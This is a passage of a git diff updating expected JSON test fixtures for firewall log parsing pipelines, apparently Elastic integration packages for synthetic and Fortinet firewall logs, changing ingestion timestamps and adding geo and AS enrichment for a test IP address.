{ - "ingested": "2021-12-09T13:37:20.234336Z" + "ingested": "2021-12-14T14:42:59.419368478Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 1 00:54:32 ptasnula6576.api.invalid proto=tcp service=ms-wbt-server status=deny src=10.54.73.158 dst=10.1.96.93 src_port=5752 dst_port=428 server_app=docon pid=5398 app_name=ntium traff_direct=internal block_count=4392 logon_user=lloinven@econs2687.internal.localdomain msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234349700Z" + "ingested": "2021-12-14T14:42:59.419368868Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 15 07:57:06 mag1506.internal.domain proto=igmp service=smtp status=deny src=10.131.126.109 dst=10.182.152.242 src_port=1877 dst_port=6998 server_app=rcitat pid=2465 app_name=ecillum traff_direct=inbound block_count=3208 logon_user=dolor@tiumto5834.api.lan msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234358600Z" + "ingested": "2021-12-14T14:42:59.419369268Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 29 14:59:40 fugits1163.host proto=icmp service=http status=deny src=10.181.247.224 dst=10.77.229.168 src_port=260 dst_port=3777 server_app=atatnon pid=6064 app_name=abor traff_direct=external block_count=329 logon_user=adol@iutal6032.www.test msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234365100Z" + "ingested": "2021-12-14T14:42:59.419369652Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 12 22:02:15 gitse2463.www5.invalid proto=ipv6-icmp service=http status=deny src=10.235.116.121 dst=10.72.162.6 src_port=1 dst_port=5516 server_app=emp pid=2861 app_name=luptas traff_direct=outbound block_count=1444 logon_user=oinv@inculp2078.host msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234371400Z" + "ingested": "2021-12-14T14:42:59.419370069Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 27 05:04:49 temse6953.www.example proto=ipv6-icmp service=https status=deny src=10.149.193.117 dst=10.28.124.236 src_port=5343 dst_port=3434 server_app=atcupi pid=3559 app_name=edquia traff_direct=internal block_count=3176 logon_user=mullam@mexerc2757.internal.home msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234377800Z" + "ingested": "2021-12-14T14:42:59.419370461Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 11 12:07:23 deriti6952.mail.domain proto=ipv6-icmp service=http status=deny src=10.34.131.224 dst=10.196.96.162 src_port=649 dst_port=6378 server_app=equatDu pid=1710 app_name=aconse traff_direct=outbound block_count=7174 logon_user=tnonproi@squira4455.api.domain msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234384200Z" + "ingested": "2021-12-14T14:42:59.419370848Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 25 19:09:57 abor1370.www.domain proto=ipv6-icmp service=https status=deny src=10.97.236.123 dst=10.77.78.180 src_port=5159 dst_port=5380 server_app=reetdol pid=4984 app_name=ugi traff_direct=inbound block_count=4782 logon_user=nisi@emveleum3661.localhost msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234388800Z" + "ingested": "2021-12-14T14:42:59.419371236Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 9 02:12:32 emullamc5418.mail.test proto=ipv6 service=ms-wbt-server status=deny src=10.82.133.66 dst=10.45.54.107 src_port=7229 dst_port=3593 server_app=nse pid=3421 app_name=quira traff_direct=unknown block_count=5362 logon_user=olorem@sedquiac6517.internal.localhost msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234393800Z" + "ingested": "2021-12-14T14:42:59.419371615Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 23 09:15:06 squirati7050.www5.lan proto=rdp service=pop3 status=deny src=10.180.180.230 dst=10.170.252.219 src_port=4147 dst_port=2454 server_app=tesseci pid=4020 app_name=radipis traff_direct=external block_count=7020 logon_user=nse@veniam3148.www5.home msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234400200Z" + "ingested": "2021-12-14T14:42:59.419371994Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 7 16:17:40 venia2079.mail.example proto=rdp service=http status=deny src=10.5.11.205 dst=10.65.144.51 src_port=4901 dst_port=2283 server_app=lumqu pid=617 app_name=autf traff_direct=outbound block_count=5050 logon_user=uptat@unt3559.www.home msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234405800Z" + "ingested": "2021-12-14T14:42:59.419372385Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 21 23:20:14 snostrum3450.www5.localhost proto=udp service=smtp status=deny src=10.195.223.82 dst=10.76.122.196 src_port=3128 dst_port=5325 server_app=atu pid=487 app_name=iame traff_direct=external block_count=593 logon_user=umiurer@rere5274.mail.domain msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234420500Z" + "ingested": "2021-12-14T14:42:59.419372893Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 5 06:22:49 gelitsed3249.corp proto=icmp service=ms-wbt-server status=deny src=10.138.210.116 dst=10.225.255.211 src_port=5595 dst_port=3369 server_app=rum pid=2442 app_name=eursinto traff_direct=external block_count=956 logon_user=fugiatn@uaeabi3728.www5.invalid msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234427400Z" + "ingested": "2021-12-14T14:42:59.419373275Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 19 13:25:23 dolor7082.internal.localhost proto=icmp service=smtp status=deny src=10.250.81.189 dst=10.219.1.151 src_port=5404 dst_port=4323 server_app=redo pid=6311 app_name=ditautf traff_direct=external block_count=3262 logon_user=ori@uamqu2804.test msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234433200Z" + "ingested": "2021-12-14T14:42:59.419373651Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 2 20:27:57 totam6886.api.localhost proto=ggp service=https status=deny src=10.54.23.133 dst=10.76.125.70 src_port=3258 dst_port=756 server_app=oluptat pid=7128 app_name=eseruntm traff_direct=internal block_count=1916 logon_user=oloreeu@olor5201.host msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234438500Z" + "ingested": "2021-12-14T14:42:59.419374035Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 17 03:30:32 laborum5749.www.example proto=igmp service=http status=deny src=10.36.110.69 dst=10.189.42.62 src_port=4187 dst_port=4262 server_app=duntut pid=2780 app_name=ullamc traff_direct=unknown block_count=170 logon_user=eque@eufug3348.www.lan msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234443400Z" + "ingested": "2021-12-14T14:42:59.419374427Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 3 10:33:06 lup3313.api.home proto=tcp service=https status=deny src=10.47.179.68 dst=10.183.202.82 src_port=5107 dst_port=2208 server_app=usmod pid=3284 app_name=amni traff_direct=unknown block_count=2645 logon_user=umfugi@stquidol239.www5.invalid msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234455500Z" + "ingested": "2021-12-14T14:42:59.419374806Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 17 17:35:40 edq5397.www.test proto=ipv6-icmp service=pop3 status=deny src=10.73.28.165 dst=10.221.206.74 src_port=3668 dst_port=1480 server_app=ihilmole pid=2314 app_name=litanim traff_direct=inbound block_count=5572 logon_user=quas@gia6531.mail.invalid msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234459700Z" + "ingested": "2021-12-14T14:42:59.419375210Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 1 00:38:14 udan6536.www5.test proto=ipv6 service=ms-wbt-server status=deny src=10.85.104.146 dst=10.14.204.36 src_port=3442 dst_port=4887 server_app=qua pid=5284 app_name=ents traff_direct=inbound block_count=973 logon_user=emp@lamcola4879.www5.localdomain msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234464400Z" + "ingested": "2021-12-14T14:42:59.419375634Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 15 07:40:49 rumet6923.www5.lan proto=rdp service=https status=deny src=10.208.18.210 dst=10.30.246.132 src_port=3601 dst_port=388 server_app=texplica pid=3990 app_name=ore traff_direct=outbound block_count=5624 logon_user=veniam@edquian330.mail.local msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234469600Z" + "ingested": "2021-12-14T14:42:59.419376023Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 29 14:43:23 itse522.internal.localdomain proto=udp service=pop3 status=deny src=10.106.249.91 dst=10.19.119.17 src_port=1732 dst_port=3822 server_app=veleumi pid=4337 app_name=tvol traff_direct=unknown block_count=2783 logon_user=lit@santi837.api.domain msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234475900Z" + "ingested": "2021-12-14T14:42:59.419376408Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 13 21:45:57 amc3059.local proto=igmp service=http status=deny src=10.29.109.126 dst=10.181.41.154 src_port=6261 dst_port=866 server_app=itseddo pid=5275 app_name=seos traff_direct=unknown block_count=6721 logon_user=labo@lpaquiof804.internal.invalid msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234481100Z" + "ingested": "2021-12-14T14:42:59.419376794Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 28 04:48:31 enbyCi3813.api.domain proto=ipv6-icmp service=https status=deny src=10.164.207.42 dst=10.164.120.197 src_port=1901 dst_port=2304 server_app=itametco pid=2286 app_name=remip traff_direct=external block_count=3116 logon_user=pta@nonn4478.host msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234486200Z" + "ingested": "2021-12-14T14:42:59.419377203Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 11 11:51:06 liquipex1155.mail.corp proto=ipv6-icmp service=smtp status=deny src=10.183.189.133 dst=10.154.191.225 src_port=5347 dst_port=7856 server_app=Loremip pid=2990 app_name=tur traff_direct=unknown block_count=6105 logon_user=ita@amquaer3985.www5.example msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234490600Z" + "ingested": "2021-12-14T14:42:59.419377591Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 25 18:53:40 isn3991.local proto=igmp service=smtp status=deny src=10.29.120.226 dst=10.103.189.199 src_port=1296 dst_port=767 server_app=exerci pid=226 app_name=eserun traff_direct=outbound block_count=5452 logon_user=emu@orem6317.local msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234497Z" + "ingested": "2021-12-14T14:42:59.419377986Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 10 01:56:14 iumtotam1010.www5.corp proto=icmp service=https status=deny src=10.133.254.23 dst=10.210.153.7 src_port=6251 dst_port=7030 server_app=nofdeFi pid=4691 app_name=sautei traff_direct=external block_count=2088 logon_user=voluptas@velill3230.www.corp msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234503200Z" + "ingested": "2021-12-14T14:42:59.419378397Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 24 08:58:48 onsecte91.www5.localdomain proto=tcp service=pop3 status=deny src=10.126.245.73 dst=10.91.2.135 src_port=180 dst_port=2141 server_app=ender pid=5647 app_name=rumSecti traff_direct=outbound block_count=4680 logon_user=olore@orumS757.www5.corp msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234508400Z" + "ingested": "2021-12-14T14:42:59.419378787Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 7 16:01:23 abori7686.internal.host proto=rdp service=https status=deny src=10.183.243.246 dst=10.137.85.123 src_port=218 dst_port=7073 server_app=ntsunti pid=2313 app_name=magnam traff_direct=internal block_count=6402 logon_user=cid@emi4534.www.localdomain msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234514600Z" + "ingested": "2021-12-14T14:42:59.419379185Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 21 23:03:57 reprehen3513.test proto=ipv6 service=smtp status=deny src=10.61.225.196 dst=10.10.86.55 src_port=4720 dst_port=5132 server_app=isiu pid=1585 app_name=mmodi traff_direct=external block_count=3034 logon_user=eniamqu@inimav1576.mail.example msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234520800Z" + "ingested": "2021-12-14T14:42:59.419379561Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 5 06:06:31 orroquis284.api.domain proto=udp service=http status=deny src=10.125.143.153 dst=10.79.73.195 src_port=2657 dst_port=457 server_app=umf pid=3141 app_name=moll traff_direct=outbound block_count=7645 logon_user=emip@aturQu7083.mail.host msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234526900Z" + "ingested": "2021-12-14T14:42:59.419379968Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 19 13:09:05 tionula2060.www5.localhost proto=ipv6 service=ms-wbt-server status=deny src=10.240.216.85 dst=10.64.139.17 src_port=2046 dst_port=2438 server_app=ice pid=6331 app_name=aal traff_direct=external block_count=4982 logon_user=nimadmin@lumqui7769.mail.local msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234533100Z" + "ingested": "2021-12-14T14:42:59.419380348Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 3 20:11:40 rumSecti111.www5.domain proto=ipv6 service=ms-wbt-server status=deny src=10.87.90.49 dst=10.222.245.80 src_port=1486 dst_port=4017 server_app=itaedict pid=4474 app_name=byCic traff_direct=inbound block_count=3380 logon_user=ptatemse@siarc6339.internal.corp msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234539300Z" + "ingested": "2021-12-14T14:42:59.419380732Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 18 03:14:14 olores7881.local proto=udp service=pop3 status=deny src=10.143.53.214 dst=10.87.144.208 src_port=3310 dst_port=2440 server_app=ipsumq pid=4855 app_name=psaquaea traff_direct=unknown block_count=5772 logon_user=psumq@ptatev6552.www.test msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234545400Z" + "ingested": "2021-12-14T14:42:59.419381130Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 1 10:16:48 tDuis3281.www5.localdomain proto=ipv6-icmp service=pop3 status=deny src=10.204.178.19 dst=10.105.97.134 src_port=616 dst_port=1935 server_app=oremque pid=1729 app_name=inimve traff_direct=unknown block_count=6564 logon_user=mexercit@byC5766.internal.home msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234551700Z" + "ingested": "2021-12-14T14:42:59.419381517Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 15 17:19:22 uptasnul2751.www5.corp proto=rdp service=smtp status=deny src=10.161.64.168 dst=10.194.67.223 src_port=7154 dst_port=5767 server_app=tatemse pid=4493 app_name=amqui traff_direct=inbound block_count=3673 logon_user=tion@hender6628.local msg=unknown", "event": { - "ingested": "2021-12-09T13:37:20.234558Z" + "ingested": "2021-12-14T14:42:59.419381900Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 30 00:21:57 upt6017.api.localdomain proto=tcp service=smtp status=deny src=10.100.154.220 dst=10.120.148.241 src_port=5535 dst_port=1655 server_app=eeufug pid=6094 app_name=modt traff_direct=external block_count=5150 logon_user=rsitam@xercit7649.www5.home msg=failure", "event": { - "ingested": "2021-12-09T13:37:20.234564100Z" + "ingested": "2021-12-14T14:42:59.419382314Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 14 07:24:31 tpers2217.internal.lan proto=udp service=ms-wbt-server status=deny src=10.116.153.19 dst=10.180.90.112 src_port=6610 dst_port=1936 server_app=olu pid=5012 app_name=dexercit traff_direct=outbound block_count=2216 logon_user=itessequ@porissu1470.domain msg=success", "event": { - "ingested": "2021-12-09T13:37:20.234570600Z" + "ingested": "2021-12-14T14:42:59.419382702Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/fortinet/data_stream/firewall/_dev/test/pipeline/test-fortinet.log-expected.json b/packages/fortinet/data_stream/firewall/_dev/test/pipeline/test-fortinet.log-expected.json index abd66fda118..7f54f83b233 100644 --- a/packages/fortinet/data_stream/firewall/_dev/test/pipeline/test-fortinet.log-expected.json +++ b/packages/fortinet/data_stream/firewall/_dev/test/pipeline/test-fortinet.log-expected.json @@ -5,6 +5,18 @@ "level": "warning" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 443, "bytes": 1130, "ip": "67.43.156.13" @@ -85,7 +97,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:22.357746800Z", + "ingested": "2021-12-14T14:43:01.495904852Z", "original": "\u003c188\u003edate=2020-04-23 time=12:17:48 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"0316013056\" type=\"utm\" subtype=\"webfilter\" eventtype=\"ftgd_blk\" level=\"warning\" vd=\"root\" eventtime=1587230269052907555 tz=\"-0500\" policyid=100602 sessionid=1234 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 srcport=61930 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=443 dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"HTTPS\" hostname=\"elastic.co\" profile=\"elasticruleset\" action=\"blocked\" reqtype=\"direct\" url=\"/config/\" sentbyte=1152 rcvdbyte=1130 direction=\"outgoing\" msg=\"URL belongs to a denied category in policy\" method=\"domain\" cat=76 catdesc=\"Internet Telephony\"", "code": "0316013056", "timezone": "-0500", @@ -106,6 +118,18 @@ "level": "notice" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 161, "bytes": 0, "ip": "67.43.156.13" @@ -175,7 +199,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:37:22.357751700Z", + "ingested": "2021-12-14T14:43:01.495907554Z", "original": "\u003c189\u003edate=2020-04-23 time=01:16:08 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" level=\"notice\" vd=\"OPERATIONAL\" eventtime=1592961368 srcip=10.10.10.10 srcport=60899 srcintf=\"srcintfname\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=161 dstintf=\"dstintfname\" dstintfrole=\"lan\" sessionid=155313 proto=17 action=\"deny\" policyid=0 policytype=\"policy\" service=\"SNMP\" dstcountry=\"Reserved\" srccountry=\"Reserved\" trandisp=\"noop\" duration=0 sentbyte=0 rcvdbyte=0 sentpkt=0 appcat=\"unscanned\" crscore=30 craction=131072 crlevel=\"high\"", "code": "0000000013", "kind": "event", @@ -196,6 +220,18 @@ "level": "notice" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 443, "bytes": 6812, "ip": "67.43.156.13" @@ -276,7 +312,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:22.357757Z", + "ingested": "2021-12-14T14:43:01.495908049Z", "original": "\u003c189\u003edate=2020-04-23 time=12:17:45 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"0317013312\" type=\"utm\" subtype=\"webfilter\" eventtype=\"ftgd_allow\" level=\"notice\" vd=\"root\" eventtime=1587230266314799756 tz=\"-0500\" policyid=38 sessionid=543234 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 srcport=65236 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=443 dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"HTTPS\" hostname=\"elastic.co\" profile=\"elasticruleset\" action=\"passthrough\" reqtype=\"direct\" url=\"/\" sentbyte=3545 rcvdbyte=6812 direction=\"outgoing\" msg=\"URL belongs to an allowed category in policy\" method=\"domain\" cat=23 catdesc=\"Web-based Email\"", "code": "0317013312", "timezone": "-0500", @@ -297,6 +333,18 @@ "level": "information" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 443, "ip": "67.43.156.13" }, @@ -384,7 +432,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:22.357762600Z", + "ingested": "2021-12-14T14:43:01.495908442Z", "original": "\u003c190\u003edate=2020-04-23 time=13:17:35 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1059028704\" type=\"utm\" subtype=\"app-ctrl\" eventtype=\"signature\" level=\"information\" vd=\"root\" eventtime=1587230255061492894 tz=\"-0400\" appid=40568 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 dstip=67.43.156.13 srcport=59790 dstport=443 srcintf=\"LAN\" srcintfrole=\"lan\" dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"SSL\" direction=\"outgoing\" policyid=12 sessionid=453234 applist=\"elasticruleset\" action=\"pass\" appcat=\"Web.Client\" app=\"HTTPS.BROWSER\" hostname=\"elastic.co\" incidentserialno=23465 url=\"/\" msg=\"Web.Client: HTTPS.BROWSER,\" apprisk=\"medium\" scertcname=\"test.elastic.co\"", "code": "1059028704", "timezone": "-0400", @@ -405,6 +453,18 @@ "level": "information" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 443, "ip": "67.43.156.13" }, @@ -492,7 +552,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:22.357767800Z", + "ingested": "2021-12-14T14:43:01.495908862Z", "original": "\u003c190\u003edate=2020-04-23 time=13:17:35 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1059028704\" type=\"utm\" subtype=\"app-ctrl\" eventtype=\"signature\" level=\"information\" vd=\"root\" eventtime=1591788391 tz=\"-0400\" appid=40568 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 dstip=67.43.156.13 srcport=59790 dstport=443 srcintf=\"LAN\" srcintfrole=\"lan\" dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"SSL\" direction=\"outgoing\" policyid=12 sessionid=453234 applist=\"elasticruleset\" action=\"pass\" appcat=\"Web.Client\" app=\"HTTPS.BROWSER\" hostname=\"elastic.co\" incidentserialno=23465 url=\"/\" msg=\"Web.Client: HTTPS.BROWSER,\" apprisk=\"medium\" scertcname=\"test.elastic.co\"", "code": "1059028704", "timezone": "-0400", @@ -513,6 +573,18 @@ "level": "notice" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 53, "ip": "67.43.156.13" }, @@ -587,7 +659,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:22.357773900Z", + "ingested": "2021-12-14T14:43:01.495909251Z", "original": "\u003c189\u003edate=2020-04-23 time=12:17:29 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1501054802\" type=\"utm\" subtype=\"dns\" eventtype=\"dns-response\" level=\"notice\" vd=\"root\" eventtime=1587230249360109339 tz=\"-0500\" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" proto=17 profile=\"test\" xid=2234 qname=\"elastic.example.com\" qtype=\"A\" qtypeval=1 qclass=\"IN\" ipaddr=\"67.43.156.13\" msg=\"Domain is monitored\" action=\"pass\" cat=23 catdesc=\"Web-based Email\"", "code": "1501054802", "timezone": "-0500", @@ -609,6 +681,18 @@ "level": "notice" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 53, "ip": "67.43.156.13" }, @@ -684,7 +768,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:22.357778600Z", + "ingested": "2021-12-14T14:43:01.495909651Z", "original": "\u003c189\u003edate=2020-04-23 time=12:17:29 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1501054802\" type=\"utm\" subtype=\"dns\" eventtype=\"dns-response\" level=\"notice\" vd=\"root\" eventtime=1587230249360109339 tz=\"-0500\" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=53 dstintf=\"wan1\" dstintfrole=\"wan\" proto=17 profile=\"test\" xid=2234 qname=\"elastic.example.com\" qtype=\"A\" qtypeval=1 qclass=\"IN\" ipaddr=\"67.43.156.13, 67.43.156.13\" msg=\"Domain is monitored\" action=\"pass\" cat=23 catdesc=\"Web-based Email\"", "code": "1501054802", "timezone": "-0500", @@ -706,6 +790,18 @@ "level": "information" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 443, "ip": "67.43.156.13" }, @@ -784,7 +880,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:22.357783Z", + "ingested": "2021-12-14T14:43:01.495910031Z", "original": "\u003c190\u003edate=2020-04-23 time=12:17:11 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1059028704\" type=\"utm\" subtype=\"app-ctrl\" eventtype=\"signature\" level=\"information\" vd=\"root\" eventtime=1587230232148674303 tz=\"-0500\" appid=40568 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 dstip=67.43.156.13 srcport=63012 dstport=443 srcintf=\"port1\" srcintfrole=\"lan\" dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"SSL\" direction=\"outgoing\" policyid=100602 sessionid=543234 applist=\"elasticruleset\" action=\"pass\" appcat=\"Web.Client\" app=\"HTTPS.BROWSER\" hostname=\"elastic.no\" incidentserialno=54323 url=\"/\" msg=\"Web.Client: HTTPS.BROWSER,\" apprisk=\"medium\"", "code": "1059028704", "timezone": "-0500", @@ -805,6 +901,18 @@ "level": "notice" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "port": 53, "ip": "67.43.156.13" }, @@ -879,7 +987,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:22.357787800Z", + "ingested": "2021-12-14T14:43:01.495910414Z", "original": "\u003c189\u003edate=2020-04-23 time=12:17:04 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"1501054802\" type=\"utm\" subtype=\"dns\" eventtype=\"dns-response\" level=\"notice\" vd=\"root\" 